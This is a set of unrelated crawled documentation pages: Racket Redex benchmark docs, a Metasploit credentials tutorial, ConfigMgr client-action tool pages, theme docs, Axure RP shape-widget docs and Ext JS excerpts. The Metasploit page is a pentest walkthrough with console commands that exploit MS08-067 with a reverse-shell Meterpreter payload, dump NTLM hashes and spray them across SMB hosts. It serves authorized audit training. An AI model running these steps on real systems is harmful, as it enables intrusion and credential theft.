5.1.8 rvm An existing model and test framework for the Racket virtual machine and bytecode verifier (Klein et al. 2013). The bugs were discovered during the development of the model and reported in section 7 of that paper. Unlike the rest of the models, we do not number the bugs for this model sequentially but instead use the numbers from Klein et al. (2013)'s work. The paper tests two properties: an internal soundness property that relates the verifier to the virtual machine model, and an external property that relates the verifier model to the verifier implementation. We did not include any that require the latter property because it requires building a complete, buggy version of the Racket runtime system to include in the benchmark. We included all of the internal properties except those numbered 1 and 7 for practical reasons. The first is the only bug in the machine model, as opposed to just the verifier, which would have required us to include the entire VM model in the benchmark. The second would have required modifying the abstract representation of the stack in the verifier model in a contorted way to mimic a more C-like implementation of a global, imperative stack. This bug was originally in the C implementation of the verifier (not the Redex model) and to replicate it in the Redex-based verifier model would require us to program in a low-level imperative way in the Redex model, something not easily done. These bugs are described in detail in Klein et al. (2013)'s paper. This model is unique in our benchmark suite because it includes a function that makes terms more likely to be useful test cases. In more detail, the machine model does not have variables, but instead is stack-based; bytecode expressions also contain internal pointers that must be valid. Generating a random (or in-order) term is relatively unlikely to produce one that satisfies these constraints. For example, of the first 10,000 terms produced by the in-order enumeration only 1625 satisfy the constraints. The ad hoc random generator produces about 900 good terms in 10,000 attempts and the uniform random generator produces about 600 in 10,000 attempts. To make terms more likely to be good test cases, this model includes a function that looks for out-of-bounds stack offsets and bogus internal pointers and replaces them with random good values. This function is applied to each of the generated terms before using them to test the model.
5.2 Managing Benchmark Modules This section describes utilities for making changes to existing modules to create new ones, intended to assist in adding bugs to models and keeping buggy models in sync with changes to the original model. Defines a syntax transformer bound to id, the effect of which is to rewrite syntax matching the pattern from to the result expression to.
The from argument should follow the grammar of a syntax-case pattern, and to acts as the corresponding result expression. The behavior of the match is the same as syntax-case, except that all identifiers in from are treated as literals with the exception of an identifier that has the same binding as a variable-id appearing in the #:variables keyword argument, which is treated as a pattern variable. (The reverse of the situation for syntax-case, where literals must be specified instead.) The rewrite will only be applied in the context of a module form, but it will be applied wherever possible within the module body, subject to a few constraints. The rest of the keyword arguments control where and how often the rewrite may be applied. The #:once-only option specifies that the rewrite can be applied no more than once, and the #:exactly-once option asserts that the rewrite must be applied once (and no more). In both cases a syntax error is raised if the condition is not met. The #:context option searches for syntax of the form (some-id . rest), where the binding of some-id matches that of the first context-id in the #:context list, at which point it recurs on rest but drops the first id from the list. Once every context-id has been matched, the rewrite can be applied.
5.3 Running Benchmark Models The get-gen thunk is called to build a generator of random terms (which may close over some state). A new generator is created each time the property is found to be false. Each generated term is passed to check to see if it is a counterexample. The interval in milliseconds between counterexamples is tracked, and the process is repeated either until the time specified by seconds has elapsed or the standard error in the average interval between counterexamples is less than 10% of the average. The result is an instance of run-results containing the total number of terms generated, the total elapsed time, and the number of counterexamples found. More detailed information can be obtained using the benchmark logging facilities, for which name refers to the name of the model, and type is a symbol indicating the generation type used. A generator module provides the function get-generator, which meets the specification for the get-gen argument to run-gen-and-check, and type, which is a symbol designating the type of the generator. A check module provides the function check, which meets the specification for the check argument to run-gen-and-check.
5.4 Logging Detailed information gathered during a benchmark run is logged to the current-logger, at the 'info level, with the message "BENCHMARK-LOGGING". The data field of the log message contains a bmark-log-data struct, which wraps data of the form: Where event is a symbol that designates the type of event, and timestamp is a symbol that contains the current-date of the event in ISO-8601 format. The information in data-list depends on the event, but must be in the form of a list alternating between a keyword and a datum, where the keyword is a short description of the datum. - Run completions ('finished), logged at the end of a run. - Every counterexample found ('counterexample). - New average intervals between counterexamples ('new-average), which are recalculated whenever a counterexample is found. - Major garbage collections ('gc-major). - Heartbeats ('hearbeat) are logged every 10 seconds by the benchmark as a way to be sure that the benchmark has not crashed.
- Timeouts ('timeout), which occur when generating or checking a single term takes longer than 5 minutes.
5.5 Plotting Plotting and analysis tools consume data of the form produced by the benchmark logging facilities (see Logging). TODO!
5.6 Finding the Benchmark Models The models included in the distribution of the benchmark are in the "redex/benchmark/models" subdirectory of the redex-benchmark package. In addition to the redex/benchmark/models/all-info library documented here, each such subdirectory contains an info file named according to the pattern "<name>-info.rkt", defining a module that provides a model-specific all-mods function. A command line interface is provided by the file "redex/benchmark/run-benchmark.rkt", which takes an "info" file as described above as its primary argument and provides options for running the listed tests. It automatically writes results from each run to a separate log file, all of which are located in a temporary directory. (The directory path is printed to standard out at the beginning of the run.)
https://docs.racket-lang.org/redex/benchmark.html
2020-11-24T03:56:35
CC-MAIN-2020-50
1606141171077.4
[]
docs.racket-lang.org
Credentials Tutorial Credentials provide a gateway into various accounts and systems. During a security audit, you may need to test the strength of password policies and verify whether they meet the minimum industry requirements. To do this, you will need to leverage methods like bruteforce, phishing, and exploits to gather passwords so you can identify the weak passwords, common passwords, and top base passwords used by an organization. Once you actually have credentials, you can try to reuse them on additional targets so you can audit password usage and identify the impact of the stolen credentials across a network. To help you gain a better understanding of how credentials are obtained, stored, and used in Metasploit, this tutorial will show you how to exploit a Windows XP target that is vulnerable to the Microsoft Security Bulletin (MS08-067), gain access to the system, collect credentials from it, and reuse those credentials to identify additional targets on which they can be used. Before You Begin Before you start on this tutorial, please make sure you have the following: - Access to a Metasploit Pro instance. - Access to a vulnerable target that has the MS08-067 vulnerability. - Access to other systems that can be reached from the Metasploit Pro instance to test for credential reuse. Terms You Should Know - Bruteforce - A password guessing attack that systematically attempts to authenticate to services using a set of user-supplied credentials. - Credential - A public, private, or complete credential pair. A credential can be associated with a realm, but it is not mandatory. - Credential reuse - A password guessing technique that tries to authenticate to a target using known credentials. - Credential type - A plaintext password, SSH key, NTLM hash, or non-replayable hash. - Login - A credential that is associated with a particular service. - Origin - The source of the credential. The origin refers to how the credential was obtained or added to the project, such as through Bruteforce Guess, an exploit, manual entry, or an imported wordlist. - Realm - The functional grouping of database schemas to which the credential belongs. A realm type can be a domain name, a Postgres database, a DB2 database, or an Oracle System Identifier (SID). - Private - A plaintext password, hash, or private SSH key. - Public - A username. - Validated credential - A credential that has successfully authenticated to a target. Tutorial Objectives This tutorial will walk you through the following tasks: - Creating a project - Scanning a target - Checking for MS08-067 - Exploiting MS08-067 - Collecting credentials - Viewing credentials - Validating credentials - Reusing credentials Create a Project The first thing we need to do is create a project, which will contain the workspace and store the data we will collect during this tutorial. To create a project, select Project > New Project from the global menu bar. When the New Project page appears and displays the configuration form, we will need to define the project name, description, and network range. Scan the Target The next thing we need to do is run a Discovery Scan on our target to fingerprint the system and to enumerate open ports and services. We will use the scan data to identify potential vulnerabilities and attack vectors that are available to exploit the target. To access the Discovery Scan, click the Scan button located on the Overview page.
When the configuration page appears, we will need to define the address of the host we want to target. Since we do not need to customize any additional settings, we can use the default settings for the rest of the scan. Now we will launch the scan. When the scan completes, we will need to review the data that it was able to gather about the hosts. To see the host data, select Analysis > Hosts from the project tab bar and then click on the host name. Looking at the host details, we can see that the target is a Windows XP system with 8 open services. We can also see that ports 445 and 139 are open, which indicates that the target can potentially be vulnerable to MS08-067. Check for Vulnerabilities Now that we have a potential vulnerability, let's run a Nexpose scan to confirm our suspicions. Nexpose will identify any vulnerabilities that our host may have, based on the services that we enumerated earlier. We have already set up our Nexpose console through the Global Settings, so we can go ahead and launch the Nexpose scan. We will need to choose the Nexpose console that we want to use, define the target we want to scan, and choose the scan template we want to use. For our purposes, we will use the Penetration Test Audit template, which will scan the target using only safe checks. Since we do not have any credentials to provide for the scan or need to specify any additional scan settings, we can go ahead and launch the scan using the default scan configuration. After the scan completes, take a look at the host data again to identify any vulnerabilities that Nexpose was able to find. As we can see from the list, MS08-067 is listed as one of the discovered vulnerabilities. Exploit the Target Now that we have confirmed that our target is missing the MS08-067 patch and vulnerable to exploitation, we're ready to exploit the target. To exploit the MS08-067 vulnerability, we will need to search for a matching exploit in the module database. The search returns a match for our query. Click on the module name to open its configuration page. The configuration page provides us with some basic information about the module, such as its type, ranking, disclosure date, reference IDs for the vulnerability, and whether the module grants high privileges on the target. There are also target, payload, module, evasion, and advanced options that you can configure to fine tune the exploit. At a minimum, we will need to define the target address and the target port (RPORT). Our target has the SMB service running on ports 139 and 445, Since we can only set one RPORT for a module run, we will go ahead and use the default target that has already been predefined for us. The next thing we want to do is configure the payload settings. Since we are attempting to exploit a Windows target, we will want a Meterpreter payload type. We will leave the Auto connection type so that Metasploit will automatically choose a compatible payload connection type for us. In most cases, the Auto option will select a reverse connection because it is more likely to establish a connection between a target machine and the attacking machine. We are now ready to run the module. Click the Run Module button to launch the exploit. When the exploit finishes, we can see from the Task Log that we were able to successfully open a session on the target, which will enable us to interact with the target to do things like gather system information and collect credentials. 
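If you are working from the open-source framework console rather than the Pro web interface, the exploit step above corresponds roughly to the following msfconsole session; the addresses are examples and option names can vary slightly between framework versions:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.184.130      # example address of the XP target
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.184.1        # example address of the attacking machine
msf exploit(ms08_067_netapi) > exploit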
Collect Credentials To access the open session, we will need to go to the Sessions list and click on the Session ID. This will open the session page, which will display a list of commands that are available to us. The command we will use is Collect System Data, which will let us loot the hashes and passwords from the system. In addition to hashes and passwords, there are other pieces of evidence we can collect as well, such as system information files, services lists, diagnostics logs, and screenshots. When you run the collection task, the task log will display and show you the events that are occurring. View Credentials in a Project Now that we have been able to loot some credentials from the target, let's take a look at how Metasploit stores and displays them. To view all credentials that are stored in a project, we need to select Credentials > Manage. When the Manage Credentials page appears, it'll show us all of the credentials that are currently stored in the project, as shown below: For each credential, Metasploit displays the following data: logins, private, public, realm, origin, validation status, tags, and private type. Validate a Credential Now that we have a list of credentials, we can go through and validate them to see if they can actually be used to log in to a target. To do this, we will need to access the single credential view. The single credential view will show us the metadata and the related logins for a particular credential. Let's take a look at the first credential in the list. To view the details for the credential, we will need to click on the username. The single credential view is shown below: We can see the public value, private value, private type, and related logins for this credential. Earlier, we defined a login as a credential that can be used against a particular service. In this case, the logins were automatically created by Metasploit when the credentials were looted from the exploited target. Metasploit detected that the looted credentials were NTLM hashes, which means that they can be used with SMB. Based on this assumption, Metasploit created a login for the credential and the SMB service. To validate the login, we will need to click on the Validate key. While the login is being validated, you will see the validation status change to "Validating". When the validation is complete, the status will change to "Not Validated" if Metasploit was unable to authenticate to the service. Otherwise, the status changes to "Validated" if Metasploit was able to successfully authenticate to the service. The validation for the credential was successful, as shown below:
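For reference, a rough console equivalent of the Collect System Data step is dumping hashes from the open Meterpreter session; the session ID below is illustrative:

msf > sessions -i 1
meterpreter > hashdump

The hashdump command prints the NTLM hashes from the target's local SAM database, which is the same kind of evidence that the collection task loots and stores as credentials.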
We'll need to click the Add Target(s) button after we have selected the targets we want to add to the workflow. Now click on the Credentials tab. Similarly to the Targets tab, we'll need to select the credentials that we want to add to the workflow. We'll reuse the credential that we validated in the previous task. Since we know that this credential has a valid login for the SMB service on port 445, we'll want to see if we can reuse it on other SMB services. Click the Next button to review the selections. If everything looks good, we can launch the attack. When the task completes, we can see the total number of credentials that were validated, the total number of targets that were validated, and the total number of logins that were successful. Now that we have more valid logins, we can try to reuse them to find additional targets that can be compromised and additional logins that can be reused. The process can continue until we are no longer able to reuse the credentials on any additional targets.
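A rough console analogue of the Credentials Reuse step is the SMB login scanner; the address range and credential values below are placeholders:

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS 192.168.1.0/24
msf auxiliary(smb_login) > set SMBUser Administrator
msf auxiliary(smb_login) > set SMBPass <password or NTLM hash>
msf auxiliary(smb_login) > run

Each successful authentication that the scanner reports corresponds to a new login recorded against that host and service.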
https://docs.rapid7.com/metasploit/credentials-tutorial/
2020-11-24T03:49:26
CC-MAIN-2020-50
1606141171077.4
[array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-create-project.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-create-project-2.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-scan-button.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-scan.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-hosts.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-host-data.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-host-data-445.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-nx-scan.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-nx-config-page.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-vulns.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-module-search.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-search-result.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-ms08067-config-page.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-module-configured.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-exploit-task-log.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-active-session.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-collect-data.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-collect-evidence-page.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-loot-task-log.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-management.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/public-link.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/single-cred-view.png', None], 
dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/validate-key.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/validated-status.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-reuse-menu.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-reuse-target-selection.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-reuse-cred-selection.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-reuse-review.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-reuse-findings.png', None], dtype=object) ]
docs.rapid7.com
Client Actions: Software Updates Scan Cycle What it does: This tool triggers a Software Updates Scan Cycle on the selected client device. How it does it: This tool completes this action by using remote WMI. Navigation: Navigate to the Software Updates Scan Cycle Tool by right clicking on a device, selecting Recast RCT > Client Actions > Software Updates Scan Cycle: Screenshot: When the action is run, the following dialog box will open: Permissions: The Software Updates Scan Cycle tool requires the following permissions: Recast Permissions: - Requires the Software Updates Scan.
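Because the tool works over remote WMI, a rough PowerShell equivalent is to trigger the Configuration Manager client schedule for the software updates scan yourself; the computer name is a placeholder, and the schedule GUID shown is the commonly documented ID for this cycle, so verify it in your environment:

Invoke-WmiMethod -ComputerName PC001 -Namespace root\ccm -Class SMS_Client -Name TriggerSchedule -ArgumentList "{00000000-0000-0000-0000-000000000113}"

This asks the ConfigMgr client on the remote device to start a software updates scan, the same kind of client action the right-click tool performs.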
https://docs.recastsoftware.com/features/Device_Tools/Client_Actions/Software_Updates_Scan_Cycle/index.html
2020-11-24T03:49:54
CC-MAIN-2020-50
1606141171077.4
[array(['media/SUSC_NAV.png', 'Software Updates Scan Cycle Navigation'], dtype=object) array(['media/ss_NAV.png', 'Software Updates Scan Cycle ScreenShot'], dtype=object) ]
docs.recastsoftware.com
Robolist Lite Articles Installation Downloading Theme Installing Theme Installing Plugins Configuring WordPress Settings Customizing Theme Creating a Custom Homepage Customizing Theme Options How to manage Site Title, Logo and Site Icon? How to manage Menu? How to manage Widget Area? How to manage Favorites Button in List? How to add header image for inner pages? Homepage Settings
https://docs.codethemes.co/docs/robolist-lite/
2020-11-24T04:12:48
CC-MAIN-2020-50
1606141171077.4
[]
docs.codethemes.co
Shape Widgets The various boxes, buttons, and headings in the Common section of the Default widget library are all shape widgets, along with the placeholder, label, and paragraph. The icons available in the Icons widget library are shapes too, as are any widgets you draw with the pen tool. Creating Shapes Drag from the Libraries Pane Axure RP comes with a wide variety of ready-to-use shapes that you can access in the Libraries pane. To add one to your design, drag it from the pane and drop it onto the canvas. The Insert Menu The Insert menu at the top-left of the interface contains a number of additional shapes you can add to your designs. Select a shape and click-and-drag on the canvas to draw it. You can constrain its dimensions by holding SHIFT as you drag. The most commonly used shapes can also be drawn using the following single-key shortcuts: - Rectangles - Ovals - Lines - Text (paragraph widgets) - Pen tool for freehand drawing The Pen Tool You can draw your own vector shapes using the pen tool, available in the Insert menu or by pressing P. - Click or drag on the canvas to place points - Click the first point to close the path, or double-click the canvas to create an open path Convert SVGs to Shapes You can edit SVG assets you've imported into Axure RP by right-clicking and selecting Transform Image → Convert SVG to Shapes. This will replace the SVG image with one or more shape widgets, which you can then edit just as you would any other shape widget. Import from Sketch You can copy assets directly from Sketch and paste them into Axure RP as shape widgets. Download and install the Axure plugin for Sketch. In Sketch, select and copy the elements you want to use with the Axure plugin. In Axure RP, use Edit → Paste or right-click the canvas to paste the Sketch elements into the project. Import from Adobe XD You can copy assets directly from Adobe XD and paste them into Axure RP as shape widgets. Download and install the Axure plugin for Adobe XD. In XD, select and copy the elements you want to use with the Axure plugin. In Axure RP, use Edit → Paste or right-click the canvas to paste the XD elements into the project. Import from Figma You can copy assets directly from Figma and paste them into Axure RP as shape widgets. Install the Axure plugin for Figma. In Figma, select the elements you want to copy and go to Plugins → Axure → Copy Selection for RP. (Alternatively, you can copy all assets with the Copy All Frames for RP option.) In Axure RP, use Edit → Paste or right-click the canvas to paste the Figma elements into the project. Adding and Editing Text You can add text to a shape widget or edit its current text via any of the options below: - Double-click the shape to enter text-editing mode - Select the shape and press ENTER to enter text-editing mode - Right-click the shape and select Edit Text in the context menu - Select the shape and begin typing. (This option is only available if you have disabled the single-key shortcuts) You can also automatically fill a shape widget with placeholder text by right-clicking it and selecting Fill with Lorem Ipsum. Image Fills In addition to the other style options available in the Style pane, shape widgets can also be given background images. To give a shape a background image, select it and use the Image button under Fill in the Style pane. Rotating Shapes Use the Rotation field at the top of the Style pane to rotate selected shapes on the canvas. The field accepts positive and negative degree values with up to two decimal places. Positive values rotate shapes to the right, and negative values rotate shapes to the left.
Reset Text Rotation After rotating a shape widget, you can set the rotation of the shape's text back to 0° by right-clicking it and selecting Transform Shape → Reset Text to 0°. Editing Shapes Change Shapes To change a shape widget to a different shape, right-click and select Select Shape in the context menu. This will bring up a list of Axure RP's preconfigured shapes that you can choose from. You can change any shape widget in this fashion. Doing this instead of creating a new shape widget when you want to change shapes preserves all of the widget's notes and interactions. Edit Vector Points After you've created a shape, you can tweak it further by editing its vector points. To get started, select the widget and double-click its border or right-click and select Edit Points in the context menu. Drag a vector point to move it. To add a new point, click a blank spot on the border. To delete a point, select it and press DELETE or right-click and select Delete in the context menu. To toggle a point between curved and sharp, double-click it or right-click and select Curve or Sharpen in the context menu. You can also curve or sharpen all points at once by right-clicking the widget and selecting either option under Transform Shape. Shape Transformations You can apply a number of transformations to one or more selected shape widgets. Right-click your selection and go to Transform Shape to access these options. Flip Horizontal/Vertical: Flips the shape across the y-axis (horizontally) or the x-axis (vertically) Unite: Unites multiple shapes into a single path Subtract: Subtracts one or more shapes from another. The front shapes will be subtracted from the backmost shape, based on their z-index (stack order) as indicated in the Outline pane Intersect: Preserves only the intersecting portions of two or more shapes Exclude: Joins two or more shapes together, excluding any overlapping segments. The overlapping area is eliminated, and the remaining sections of each shape are preserved in one shape that could potentially have multiple paths Combine: Combines two or more shapes into a single shape and preserves each original path (as opposed to Unite) Break Apart: Breaks previously combined shapes into separate shapes Curve/Sharpen All Points: Curves or sharpens all vector points in the selected shape(s) Convert to Image If you want to swap out a placeholder or other shape for a real image, you can convert your shape widget to an image widget while preserving all its notes and interactions. Just right-click the shape widget and select Convert to Image in the context menu. Reference Pages Assigning a reference page to a shape does three things: - The text on the shape is set to the name of the page. - The shape's text is automatically updated if the page is renamed. - Clicking the shape in the web browser opens the page. To assign a reference page to a shape widget, click Show All in the Shape Properties section of the Interaction pane, and then click Reference Page.
https://docs.axure.com/axure-rp/reference/shapes/
2020-11-24T03:31:39
CC-MAIN-2020-50
1606141171077.4
[array(['/assets/screenshots/widgets/box-1-icon.png', 'Box 1 widget'], dtype=object) array(['/assets/screenshots/widgets/ellipse-icon.png', 'Ellipse widget'], dtype=object) array(['/assets/screenshots/widgets/placeholder-icon.png', 'Placeholder widget'], dtype=object) array(['/assets/screenshots/widgets/button-icon.png', 'Button widget'], dtype=object) array(['/assets/screenshots/widgets/heading-1-icon.png', 'Heading 1 widget'], dtype=object) array(['/assets/screenshots/widgets/label-icon.png', 'Label widget'], dtype=object) array(['/assets/screenshots/widgets/paragraph-icon.png', 'Paragraph widget'], dtype=object) array(['/assets/screenshots/widgets/sticky-1-icon.png', 'Sticky 1 widget'], dtype=object) array(['/assets/screenshots/widgets/shapes-insert-menu.png', 'shape options in the Insert menu'], dtype=object) array(['/assets/screenshots/widgets/lines-pen-tool.png', 'using the pen tool to draw a curved line'], dtype=object) array(['/assets/screenshots/widgets/shapes-image-fills.png', "setting a shape's background fill to an image"], dtype=object) array(['/assets/screenshots/widgets/organizing-widgets-rotating1.png', None], dtype=object) array(['/assets/screenshots/widgets/organizing-widgets-rotating2.png', None], dtype=object) array(['/assets/screenshots/widgets/shapes-edit-vector-points.png', "editing a shape's vector points"], dtype=object) array(['/assets/screenshots/widgets/shapes-transform-unite.png', 'unite transformation'], dtype=object) array(['/assets/screenshots/widgets/shapes-transform-subtract.png', 'subtract transformation'], dtype=object) array(['/assets/screenshots/widgets/shapes-transform-intersect.png', 'intersect transformation'], dtype=object) array(['/assets/screenshots/widgets/shapes-transform-exclude.png', 'exclude transformation'], dtype=object) array(['/assets/screenshots/widgets/shapes-reference-pages.png', 'selecting a reference page for a shape widget'], dtype=object)]
docs.axure.com
One of the first things you will notice when you create a Knowledge Base site is the home page looks quite empty. There are a couple of web parts already added to the page and one of them is the Tree View web part. You need to configure this web part to suit your environment. From the KB Admin site, edit the Tree View web part.
https://docs.bamboosolutions.com/document/configure_the_kb_tree_view_web_part/
2020-11-24T03:23:42
CC-MAIN-2020-50
1606141171077.4
[]
docs.bamboosolutions.com
Field Used for Source warehouse Select a warehouse from which goods are to be withdrawn. Select a source warehouse from the list of created warehouses. Destination warehouse Select a warehouse you will transfer the goods to. Choose a destination warehouse from the list of created warehouses. You can select one and the same warehouse as both source and destination warehouses if you wish to transfer goods within one warehouse but between its different sections or if you wish to move goods between different inventory accounts. Number Document number is assigned automatically when you save the warehouse movement document based on the selected numerator. Users with the appropriate permissions can override the auto-generated number and enter it manually. After overriding the warehouse movement document number, automated numbering will proceed in the same manner but using the manually set number as a start value. Date Date field is automatically assigned the date and time when the new warehouse movement document was created. Date field indicates the posting date and time, the document date and time as well as the date and time when the movement is to take place or when it took place. You can override the auto-generated date and enter it manually. Note Add any extra details regarding the transfer of goods if needed. Attachment Add any additional files or external links related to the warehouse movement.
https://docs.codejig.com/en/entity2305843015656313960/view/4611686018427392343
2020-11-24T03:04:36
CC-MAIN-2020-50
1606141171077.4
[]
docs.codejig.com
Outcome probabilities Contents - 1 Configure outcome probabilities - 2 Trigger an action map based on outcome probabilities - 3 Trigger based only on outcome probabilities - 4 Trigger an action map by outcome probability - 5 Trigger an action map based on a change in behavior - 6 Improve your results Learn how to trigger an action map based on the likelihood that an outcome will occur. Prerequisites - Configure the following permissions in Genesys Cloud: - Journey > Action Map > Add, Delete, Edit, and View (to create action maps) - Journey > Action Target > View (to select a team to handle interactions from the action map) - Create segments. - Create outcomes. Configure outcome probabilities When you create an action map, you configure it to trigger based on the probability that a user will achieve an outcome. For information about how Genesys Predictive Engagement, predicts outcome probabilities, see Overview of outcome predictions and probabilities. - In the action map, under Configure outcome probability, select the outcome. - Use the sliders to configure the outcome probability. Trigger an action map based on outcome probabilities You can create an action map that triggers when: - A customer is likely to achieve a specific outcome - The customer's more recent behavior changed that likelihood After you select an outcome, these configuration choices appear as two sliders: - To minimize an outcome, such as preventing a call to Support, use only the Set likelihood to achieve outcome slider. - To maximize an outcome, such as making a sale, use both sliders. Example: Minimize the likelihood of a negative outcome You want to initiate a proactive chat when a customer is on the Contact Us page and is likely to call for assistance. To avoid the phone call, you set the Set likelihood to achieve outcome slider to 70% because Genesys Predictive Engagement estimates that by the time a customer is on the Contact Us page, they are 70% likely to call Support. Example: Maximize the likelihood of a positive outcome When a customer puts an item in their shopping cart, Genesys Predictive Engagement predicts that a customer is 70% likely to complete their purchase. However, when a customer subsequently removes the item from their cart, Genesys Predictive Engagement changes its prediction to 30% or less. To get the customer back on track if this happens, set the Set likelihood to achieve outcome slider to 70% and the Detect change in behavior slider to 30% because you want to pop a chat that encourages the customer to complete their purchase. Trigger based only on outcome probabilities You can trigger the action map based on a combination of a matched segment or visitor action and the probability of them achieving an outcome. However, you do not have to. Trigger an action map by outcome probability To configure the action map to trigger based on the likelihood of an outcome occurring: - From the Configure Outcome Probability list, select the outcome. - Set the Set likelihood to achieve outcome slider to the desired value. Trigger an action map based on a change in behavior To configure the action map to trigger based on a change in the customer's behavior: - From the Configure Outcome Probability list, select the outcome. - Set the Set likelihood to achieve outcome slider to the desired value. - Select the Detect change in behavior box. - Set the Detect change in behavior slider to the desired value. Improve your results Initially set the sliders to approximate positions. 
Start with any reasonable values and observe the effect of the action map. After a few days, change the settings and compare your new results. Adjust the sliders as often as you want until you achieve the results you want.
https://all.docs.genesys.com/ATC/Current/AdminGuide/Outcome_probabilities
2020-11-24T03:42:18
CC-MAIN-2020-50
1606141171077.4
[]
all.docs.genesys.com
How to Organize Your Day Using Goal Setting CHL Training Software Most of us can agree that time is a significant resource, and how we spend the time we have determines how much of an impact we make in our own lives and in the lives of others. The first step toward managing time is to have a set method for handling the time available to you. Today this can be done with goal-setting software, which can be used on both mobile and desktop devices. Goal-setting software is designed to help the person using it set the goals they wish to achieve for any given day. The software can be downloaded for free or at a cost, depending on the features it supports and the developer who designed it. To use it, you download it and create a personal profile using the provided data fields. Depending on what you want to achieve on a given day, you can then set your goals using the goal setter. For example, you can set goals for the number of requests you have to make, the number of deals you wish to close on a given day, the number of laps to run on the racing track, and so on. Goal-setting software often includes other noteworthy components as well. The main advantage of having goal-setting software is that it helps you manage your time efficiently. It also helps you keep track of everything you have accomplished over a period of time, so you have a good opportunity to review how you fared previously and can set new goals based on past trends. Read more now.
http://docs-prints.com/2020/09/19/5-key-takeaways-on-the-road-to-dominating-12/
2020-11-24T04:16:35
CC-MAIN-2020-50
1606141171077.4
[]
docs-prints.com
Client Actions: Software Metering Usage Report Cycle What it does: This tool collects the data that allows you to monitor client software usage. How it does it: This tool completes this action by using remote WMI. Navigation: Navigate to the Software Metering Usage Report Cycle Tool by right clicking on a device, selecting Recast RCT > Client Actions > Software Metering Usage Report Cycle: Screenshot: When the action is run, the following dialog box will open: Permissions: The Software Metering Usage Report Cycle tool requires the following permissions: Recast Permissions: - Requires the Software Metering Usage Report.
https://docs.recastsoftware.com/features/Device_Tools/Client_Actions/Software_Metering_Usage_Report_Cycle/index.html
2020-11-24T04:18:03
CC-MAIN-2020-50
1606141171077.4
[array(['media/SMURC_NAV.png', 'Software Metering Usage Report Cycle Navigation'], dtype=object) array(['media/SS_NAV.png', 'Software Metering Usage Report Cycle ScreenShot'], dtype=object)]
docs.recastsoftware.com
Excerpts from the documentation comments in src/Application.js: - @cfg {String} extend A class name to use with the `Ext.application` call. The class must also extend {@link Ext.app.Application}. - A string representing the full class name of the main view, or the partial class name following "AppName.view." (provided your main view class follows that convention). - Called automatically when an update to either the Application Cache or the Local Storage Cache is detected. @param {Object} [updateInfo] Update information object; contains properties for checking which cache triggered the update. - Called automatically when the page has completely loaded. This is an empty function that should be overridden. - @return {Boolean} By default, the Application will dispatch to the configured startup controller. - Get an application's controller based on name or id. Generally, the controller id will be the same as the name.
https://docs.sencha.com/extjs/6.5.1/modern/src/Application.js.html
2020-11-24T03:48:30
CC-MAIN-2020-50
1606141171077.4
[]
docs.sencha.com
